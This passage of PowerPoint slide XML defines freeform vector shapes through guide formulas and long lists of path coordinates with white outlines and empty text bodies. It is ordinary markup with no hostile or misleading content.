              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36392" name="Freeform 124"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2926" y="3038"/>
                <a:ext cx="195" cy="196"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 195"/>
                  <a:gd name="T1" fmla="*/ 3 h 196"/>
                  <a:gd name="T2" fmla="*/ 27 w 195"/>
                  <a:gd name="T3" fmla="*/ 0 h 196"/>
                  <a:gd name="T4" fmla="*/ 43 w 195"/>
                  <a:gd name="T5" fmla="*/ 0 h 196"/>
                  <a:gd name="T6" fmla="*/ 63 w 195"/>
                  <a:gd name="T7" fmla="*/ 0 h 196"/>
                  <a:gd name="T8" fmla="*/ 76 w 195"/>
                  <a:gd name="T9" fmla="*/ 1 h 196"/>
                  <a:gd name="T10" fmla="*/ 78 w 195"/>
                  <a:gd name="T11" fmla="*/ 10 h 196"/>
                  <a:gd name="T12" fmla="*/ 90 w 195"/>
                  <a:gd name="T13" fmla="*/ 33 h 196"/>
                  <a:gd name="T14" fmla="*/ 106 w 195"/>
                  <a:gd name="T15" fmla="*/ 33 h 196"/>
                  <a:gd name="T16" fmla="*/ 121 w 195"/>
                  <a:gd name="T17" fmla="*/ 30 h 196"/>
                  <a:gd name="T18" fmla="*/ 123 w 195"/>
                  <a:gd name="T19" fmla="*/ 17 h 196"/>
                  <a:gd name="T20" fmla="*/ 140 w 195"/>
                  <a:gd name="T21" fmla="*/ 18 h 196"/>
                  <a:gd name="T22" fmla="*/ 147 w 195"/>
                  <a:gd name="T23" fmla="*/ 23 h 196"/>
                  <a:gd name="T24" fmla="*/ 159 w 195"/>
                  <a:gd name="T25" fmla="*/ 24 h 196"/>
                  <a:gd name="T26" fmla="*/ 159 w 195"/>
                  <a:gd name="T27" fmla="*/ 36 h 196"/>
                  <a:gd name="T28" fmla="*/ 157 w 195"/>
                  <a:gd name="T29" fmla="*/ 55 h 196"/>
                  <a:gd name="T30" fmla="*/ 164 w 195"/>
                  <a:gd name="T31" fmla="*/ 66 h 196"/>
                  <a:gd name="T32" fmla="*/ 165 w 195"/>
                  <a:gd name="T33" fmla="*/ 80 h 196"/>
                  <a:gd name="T34" fmla="*/ 171 w 195"/>
                  <a:gd name="T35" fmla="*/ 83 h 196"/>
                  <a:gd name="T36" fmla="*/ 193 w 195"/>
                  <a:gd name="T37" fmla="*/ 82 h 196"/>
                  <a:gd name="T38" fmla="*/ 195 w 195"/>
                  <a:gd name="T39" fmla="*/ 101 h 196"/>
                  <a:gd name="T40" fmla="*/ 191 w 195"/>
                  <a:gd name="T41" fmla="*/ 109 h 196"/>
                  <a:gd name="T42" fmla="*/ 186 w 195"/>
                  <a:gd name="T43" fmla="*/ 114 h 196"/>
                  <a:gd name="T44" fmla="*/ 161 w 195"/>
                  <a:gd name="T45" fmla="*/ 131 h 196"/>
                  <a:gd name="T46" fmla="*/ 161 w 195"/>
                  <a:gd name="T47" fmla="*/ 165 h 196"/>
                  <a:gd name="T48" fmla="*/ 168 w 195"/>
                  <a:gd name="T49" fmla="*/ 175 h 196"/>
                  <a:gd name="T50" fmla="*/ 175 w 195"/>
                  <a:gd name="T51" fmla="*/ 191 h 196"/>
                  <a:gd name="T52" fmla="*/ 149 w 195"/>
                  <a:gd name="T53" fmla="*/ 195 h 196"/>
                  <a:gd name="T54" fmla="*/ 135 w 195"/>
                  <a:gd name="T55" fmla="*/ 193 h 196"/>
                  <a:gd name="T56" fmla="*/ 111 w 195"/>
                  <a:gd name="T57" fmla="*/ 192 h 196"/>
                  <a:gd name="T58" fmla="*/ 103 w 195"/>
                  <a:gd name="T59" fmla="*/ 187 h 196"/>
                  <a:gd name="T60" fmla="*/ 66 w 195"/>
                  <a:gd name="T61" fmla="*/ 186 h 196"/>
                  <a:gd name="T62" fmla="*/ 36 w 195"/>
                  <a:gd name="T63" fmla="*/ 186 h 196"/>
                  <a:gd name="T64" fmla="*/ 25 w 195"/>
                  <a:gd name="T65" fmla="*/ 179 h 196"/>
                  <a:gd name="T66" fmla="*/ 15 w 195"/>
                  <a:gd name="T67" fmla="*/ 181 h 196"/>
                  <a:gd name="T68" fmla="*/ 2 w 195"/>
                  <a:gd name="T69" fmla="*/ 183 h 196"/>
                  <a:gd name="T70" fmla="*/ 0 w 195"/>
                  <a:gd name="T71" fmla="*/ 165 h 196"/>
                  <a:gd name="T72" fmla="*/ 5 w 195"/>
                  <a:gd name="T73" fmla="*/ 156 h 196"/>
                  <a:gd name="T74" fmla="*/ 9 w 195"/>
                  <a:gd name="T75" fmla="*/ 135 h 196"/>
                  <a:gd name="T76" fmla="*/ 17 w 195"/>
                  <a:gd name="T77" fmla="*/ 116 h 196"/>
                  <a:gd name="T78" fmla="*/ 25 w 195"/>
                  <a:gd name="T79" fmla="*/ 108 h 196"/>
                  <a:gd name="T80" fmla="*/ 32 w 195"/>
                  <a:gd name="T81" fmla="*/ 91 h 196"/>
                  <a:gd name="T82" fmla="*/ 31 w 195"/>
                  <a:gd name="T83" fmla="*/ 73 h 196"/>
                  <a:gd name="T84" fmla="*/ 23 w 195"/>
                  <a:gd name="T85" fmla="*/ 59 h 196"/>
                  <a:gd name="T86" fmla="*/ 25 w 195"/>
                  <a:gd name="T87" fmla="*/ 47 h 196"/>
                  <a:gd name="T88" fmla="*/ 27 w 195"/>
                  <a:gd name="T89" fmla="*/ 39 h 196"/>
                  <a:gd name="T90" fmla="*/ 19 w 195"/>
                  <a:gd name="T91" fmla="*/ 25 h 196"/>
                  <a:gd name="T92" fmla="*/ 14 w 195"/>
                  <a:gd name="T93" fmla="*/ 12 h 19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195"/>
                  <a:gd name="T142" fmla="*/ 0 h 196"/>
                  <a:gd name="T143" fmla="*/ 195 w 195"/>
                  <a:gd name="T144" fmla="*/ 196 h 19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195" h="196">
                    <a:moveTo>
                      <a:pt x="9" y="4"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="10" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="4"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36393" name="Freeform 125"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3573" y="2193"/>
                <a:ext cx="225" cy="153"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 136 w 225"/>
                  <a:gd name="T1" fmla="*/ 136 h 153"/>
                  <a:gd name="T2" fmla="*/ 124 w 225"/>
                  <a:gd name="T3" fmla="*/ 127 h 153"/>
                  <a:gd name="T4" fmla="*/ 97 w 225"/>
                  <a:gd name="T5" fmla="*/ 106 h 153"/>
                  <a:gd name="T6" fmla="*/ 77 w 225"/>
                  <a:gd name="T7" fmla="*/ 99 h 153"/>
                  <a:gd name="T8" fmla="*/ 60 w 225"/>
                  <a:gd name="T9" fmla="*/ 95 h 153"/>
                  <a:gd name="T10" fmla="*/ 44 w 225"/>
                  <a:gd name="T11" fmla="*/ 98 h 153"/>
                  <a:gd name="T12" fmla="*/ 30 w 225"/>
                  <a:gd name="T13" fmla="*/ 111 h 153"/>
                  <a:gd name="T14" fmla="*/ 22 w 225"/>
                  <a:gd name="T15" fmla="*/ 103 h 153"/>
                  <a:gd name="T16" fmla="*/ 22 w 225"/>
                  <a:gd name="T17" fmla="*/ 88 h 153"/>
                  <a:gd name="T18" fmla="*/ 24 w 225"/>
                  <a:gd name="T19" fmla="*/ 79 h 153"/>
                  <a:gd name="T20" fmla="*/ 18 w 225"/>
                  <a:gd name="T21" fmla="*/ 72 h 153"/>
                  <a:gd name="T22" fmla="*/ 11 w 225"/>
                  <a:gd name="T23" fmla="*/ 73 h 153"/>
                  <a:gd name="T24" fmla="*/ 13 w 225"/>
                  <a:gd name="T25" fmla="*/ 68 h 153"/>
                  <a:gd name="T26" fmla="*/ 20 w 225"/>
                  <a:gd name="T27" fmla="*/ 68 h 153"/>
                  <a:gd name="T28" fmla="*/ 17 w 225"/>
                  <a:gd name="T29" fmla="*/ 61 h 153"/>
                  <a:gd name="T30" fmla="*/ 10 w 225"/>
                  <a:gd name="T31" fmla="*/ 59 h 153"/>
                  <a:gd name="T32" fmla="*/ 5 w 225"/>
                  <a:gd name="T33" fmla="*/ 55 h 153"/>
                  <a:gd name="T34" fmla="*/ 6 w 225"/>
                  <a:gd name="T35" fmla="*/ 44 h 153"/>
                  <a:gd name="T36" fmla="*/ 10 w 225"/>
                  <a:gd name="T37" fmla="*/ 40 h 153"/>
                  <a:gd name="T38" fmla="*/ 17 w 225"/>
                  <a:gd name="T39" fmla="*/ 43 h 153"/>
                  <a:gd name="T40" fmla="*/ 19 w 225"/>
                  <a:gd name="T41" fmla="*/ 40 h 153"/>
                  <a:gd name="T42" fmla="*/ 25 w 225"/>
                  <a:gd name="T43" fmla="*/ 44 h 153"/>
                  <a:gd name="T44" fmla="*/ 30 w 225"/>
                  <a:gd name="T45" fmla="*/ 43 h 153"/>
                  <a:gd name="T46" fmla="*/ 31 w 225"/>
                  <a:gd name="T47" fmla="*/ 41 h 153"/>
                  <a:gd name="T48" fmla="*/ 36 w 225"/>
                  <a:gd name="T49" fmla="*/ 38 h 153"/>
                  <a:gd name="T50" fmla="*/ 26 w 225"/>
                  <a:gd name="T51" fmla="*/ 27 h 153"/>
                  <a:gd name="T52" fmla="*/ 23 w 225"/>
                  <a:gd name="T53" fmla="*/ 17 h 153"/>
                  <a:gd name="T54" fmla="*/ 14 w 225"/>
                  <a:gd name="T55" fmla="*/ 14 h 153"/>
                  <a:gd name="T56" fmla="*/ 6 w 225"/>
                  <a:gd name="T57" fmla="*/ 21 h 153"/>
                  <a:gd name="T58" fmla="*/ 7 w 225"/>
                  <a:gd name="T59" fmla="*/ 32 h 153"/>
                  <a:gd name="T60" fmla="*/ 3 w 225"/>
                  <a:gd name="T61" fmla="*/ 25 h 153"/>
                  <a:gd name="T62" fmla="*/ 11 w 225"/>
                  <a:gd name="T63" fmla="*/ 12 h 153"/>
                  <a:gd name="T64" fmla="*/ 35 w 225"/>
                  <a:gd name="T65" fmla="*/ 14 h 153"/>
                  <a:gd name="T66" fmla="*/ 49 w 225"/>
                  <a:gd name="T67" fmla="*/ 32 h 153"/>
                  <a:gd name="T68" fmla="*/ 64 w 225"/>
                  <a:gd name="T69" fmla="*/ 31 h 153"/>
                  <a:gd name="T70" fmla="*/ 73 w 225"/>
                  <a:gd name="T71" fmla="*/ 18 h 153"/>
                  <a:gd name="T72" fmla="*/ 86 w 225"/>
                  <a:gd name="T73" fmla="*/ 11 h 153"/>
                  <a:gd name="T74" fmla="*/ 95 w 225"/>
                  <a:gd name="T75" fmla="*/ 9 h 153"/>
                  <a:gd name="T76" fmla="*/ 97 w 225"/>
                  <a:gd name="T77" fmla="*/ 0 h 153"/>
                  <a:gd name="T78" fmla="*/ 109 w 225"/>
                  <a:gd name="T79" fmla="*/ 8 h 153"/>
                  <a:gd name="T80" fmla="*/ 120 w 225"/>
                  <a:gd name="T81" fmla="*/ 14 h 153"/>
                  <a:gd name="T82" fmla="*/ 121 w 225"/>
                  <a:gd name="T83" fmla="*/ 23 h 153"/>
                  <a:gd name="T84" fmla="*/ 126 w 225"/>
                  <a:gd name="T85" fmla="*/ 32 h 153"/>
                  <a:gd name="T86" fmla="*/ 139 w 225"/>
                  <a:gd name="T87" fmla="*/ 33 h 153"/>
                  <a:gd name="T88" fmla="*/ 151 w 225"/>
                  <a:gd name="T89" fmla="*/ 37 h 153"/>
                  <a:gd name="T90" fmla="*/ 158 w 225"/>
                  <a:gd name="T91" fmla="*/ 54 h 153"/>
                  <a:gd name="T92" fmla="*/ 179 w 225"/>
                  <a:gd name="T93" fmla="*/ 75 h 153"/>
                  <a:gd name="T94" fmla="*/ 200 w 225"/>
                  <a:gd name="T95" fmla="*/ 87 h 153"/>
                  <a:gd name="T96" fmla="*/ 218 w 225"/>
                  <a:gd name="T97" fmla="*/ 95 h 153"/>
                  <a:gd name="T98" fmla="*/ 224 w 225"/>
                  <a:gd name="T99" fmla="*/ 103 h 153"/>
                  <a:gd name="T100" fmla="*/ 209 w 225"/>
                  <a:gd name="T101" fmla="*/ 109 h 153"/>
                  <a:gd name="T102" fmla="*/ 192 w 225"/>
                  <a:gd name="T103" fmla="*/ 123 h 153"/>
                  <a:gd name="T104" fmla="*/ 172 w 225"/>
                  <a:gd name="T105" fmla="*/ 141 h 153"/>
                  <a:gd name="T106" fmla="*/ 165 w 225"/>
                  <a:gd name="T107" fmla="*/ 150 h 153"/>
                  <a:gd name="T108" fmla="*/ 145 w 225"/>
                  <a:gd name="T109" fmla="*/ 150 h 153"/>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225"/>
                  <a:gd name="T166" fmla="*/ 0 h 153"/>
                  <a:gd name="T167" fmla="*/ 225 w 225"/>
                  <a:gd name="T168" fmla="*/ 153 h 153"/>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225" h="153">
                    <a:moveTo>
                      <a:pt x="137" y="147"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="137" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="65"/>
